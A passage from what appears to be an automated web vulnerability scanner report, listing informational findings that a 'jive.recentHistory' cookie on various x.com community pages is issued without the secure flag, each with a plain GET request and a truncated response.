HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:10 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323034303b31342c323133313b31342c323030343b31342c323033393b31342c323131343b31342c323133333b31342c323032353b31342c323033343b31342c323032333b31342c323032343b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:51:10 GMT; Path=/
Vary: User-Agent
JP: D=100595 t=1313157070639699
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.27. https://www.x.com/community/ppx/global/cn  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/global/cn

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /community/ppx/global/cn HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:10 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323133313b31342c323030343b31342c323033393b31342c323034303b31342c323131343b31342c323133333b31342c323032353b31342c323033343b31342c323032333b31342c323032343b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:51:10 GMT; Path=/
Vary: User-Agent
JP: D=70307 t=1313157070898066
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.28. https://www.x.com/community/ppx/global/de  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/global/de

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /community/ppx/global/de HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:12 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323034323b31342c323133313b31342c323034313b31342c323034303b31342c323030343b31342c323033393b31342c323131343b31342c323133333b31342c323032353b31342c323033343b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:51:12 GMT; Path=/
Vary: User-Agent
JP: D=91052 t=1313157072186357
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.29. https://www.x.com/community/ppx/global/fr  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/global/fr

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /community/ppx/global/fr HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:11 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323034313b31342c323034303b31342c323033393b31342c323133313b31342c323030343b31342c323131343b31342c323133333b31342c323032353b31342c323033343b31342c323032333b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:51:11 GMT; Path=/
Vary: User-Agent
JP: D=90705 t=1313157071522380
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.30. https://www.x.com/community/ppx/global/it  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/global/it

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /community/ppx/global/it HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:12 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323034333b31342c323133303b31342c323034323b31342c323030343b31342c323034313b31342c323034303b31342c323133313b31342c323033393b31342c323131343b31342c323133333b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:51:13 GMT; Path=/
Vary: User-Agent
JP: D=83031 t=1313157073107237
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.31. https://www.x.com/community/ppx/global/jp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/global/jp

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /community/ppx/global/jp HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:13 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323133303b31342c323034323b31342c323034313b31342c323034333b31342c323030343b31342c323034303b31342c323133313b31342c323033393b31342c323131343b31342c323133333b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:51:13 GMT; Path=/
Vary: User-Agent
JP: D=64298 t=1313157073255195
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.32. https://www.x.com/community/ppx/global/mx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/global/mx

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /community/ppx/global/mx HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:14 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323034343b31342c323133303b31342c323030343b31342c323034323b31342c323034333b31342c323034313b31342c323034303b31342c323133313b31342c323033393b31342c323131343b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:51:14 GMT; Path=/
Vary: User-Agent
JP: D=84686 t=1313157074147841
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.33. https://www.x.com/community/ppx/global/nl  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/global/nl

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /community/ppx/global/nl HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:14 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323034353b31342c323034333b31342c323133303b31342c323034343b31342c323030343b31342c323034323b31342c323034313b31342c323034303b31342c323133313b31342c323033393b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:51:14 GMT; Path=/
Vary: User-Agent
JP: D=74016 t=1313157074525656
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.34. https://www.x.com/community/ppx/global/sp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/global/sp

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /community/ppx/global/sp HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:15 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323034363b31342c323034353b31342c323034343b31342c323034333b31342c323133303b31342c323030343b31342c323034323b31342c323034313b31342c323034303b31342c323133313b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:51:15 GMT; Path=/
Vary: User-Agent
JP: D=120118 t=1313157075242154
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.35. https://www.x.com/community/ppx/global/uk  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/global/uk

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /community/ppx/global/uk HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:15 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323034373b31342c323034343b31342c323034363b31342c323034353b31342c323034333b31342c323133303b31342c323030343b31342c323034323b31342c323034313b31342c323034303b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:51:15 GMT; Path=/
Vary: User-Agent
JP: D=132311 t=1313157075777765
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.36. https://www.x.com/community/ppx/ipn  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/ipn

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /community/ppx/ipn HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:00 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323032383b31342c323032363b31342c323032373b31342c323032303b31342c323031383b31342c323036333b31342c323031373b31342c323030363b31342c323031363b31342c323234363b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:51:01 GMT; Path=/
Vary: User-Agent
JP: D=93490 t=1313157061548233
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.37. https://www.x.com/community/ppx/marketplaces  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/marketplaces

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /community/ppx/marketplaces HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:18 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323134323b31342c323134353b31342c323134333b31342c323030353b31342c323034373b31342c323034363b31342c323034353b31342c323034343b31342c323034333b31342c323133303b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:51:18 GMT; Path=/
Vary: User-Agent
JP: D=108959 t=1313157078551586
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.38. https://www.x.com/community/ppx/mass_pay  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/mass_pay

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /community/ppx/mass_pay HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:50:33 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323031313b31342c323030393b31342c323030373b31342c323030333b31342c323031343b31342c323030383b31342c323031303b31342c323031393b31342c323237363b31342c323237303b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:50:34 GMT; Path=/
Vary: User-Agent
JP: D=98932 t=1313157034722623
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.39. https://www.x.com/community/ppx/offlineanddevices  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/offlineanddevices

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /community/ppx/offlineanddevices HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:18 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323134363b31342c323134323b31342c323030353b31342c323134333b31342c323134353b31342c323034373b31342c323034363b31342c323034353b31342c323034343b31342c323034333b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:51:18 GMT; Path=/
Vary: User-Agent
JP: D=113532 t=1313157078857855
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.40. https://www.x.com/community/ppx/p2p  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/p2p

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /community/ppx/p2p HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:18 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323134343b31342c323134323b31342c323134333b31342c323134353b31342c323134363b31342c323030353b31342c323034373b31342c323034363b31342c323034353b31342c323034343b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:51:19 GMT; Path=/
Vary: User-Agent
JP: D=81213 t=1313157079302842
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.41. https://www.x.com/community/ppx/payflow_link  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/payflow_link

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /community/ppx/payflow_link HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:50:55 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323031333b31342c323236393b31342c323232313b31342c323235313b31342c323130303b31342c323038343b31342c323036333b31342c323036323b31342c323035323b31342c323035303b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:50:56 GMT; Path=/
Vary: User-Agent
JP: D=81349 t=1313157056540618
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.42. https://www.x.com/community/ppx/payflow_pro  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/payflow_pro

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /community/ppx/payflow_pro HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:50:32 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323031343b31342c323030393b31342c323030383b31342c323031303b31342c323031393b31342c323237363b31342c323237303b31342c323030353b31342c323030373b31342c323030343b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:50:33 GMT; Path=/
Vary: User-Agent
JP: D=271432 t=1313157033322018
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.43. https://www.x.com/community/ppx/payflow_xml_reporting  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/payflow_xml_reporting

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /community/ppx/payflow_xml_reporting HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:00 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323032373b31342c323032303b31342c323032363b31342c323031383b31342c323031373b31342c323036333b31342c323030363b31342c323031363b31342c323234363b31342c323031353b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:51:01 GMT; Path=/
Vary: User-Agent
JP: D=106498 t=1313157060903457
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.44. https://www.x.com/community/ppx/pdt  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/pdt

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /community/ppx/pdt HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:01 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323032393b31342c323033303b31342c323032303b31342c323032373b31342c323032383b31342c323036333b31342c323032363b31342c323031383b31342c323031373b31342c323030363b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:51:02 GMT; Path=/
Vary: User-Agent
JP: D=122974 t=1313157061920177
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.45. https://www.x.com/community/ppx/permissions  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/permissions

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /community/ppx/permissions HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:50:59 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323032303b31342c323032363b31342c323031363b31342c323031373b31342c323030363b31342c323031383b31342c323036333b31342c323234363b31342c323031353b31342c323031333b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:51:00 GMT; Path=/
Vary: User-Agent
JP: D=124196 t=1313157059978751
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.46. https://www.x.com/community/ppx/press  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/press

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /community/ppx/press HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:20 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323134393b31342c323038323b31342c323030353b31342c323134363b31342c323134343b31342c323038363b31342c323134323b31342c323134333b31342c323134353b31342c323034373b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:51:20 GMT; Path=/
Vary: User-Agent
JP: D=85690 t=1313157080601110
Cache-Control: no-cache, private
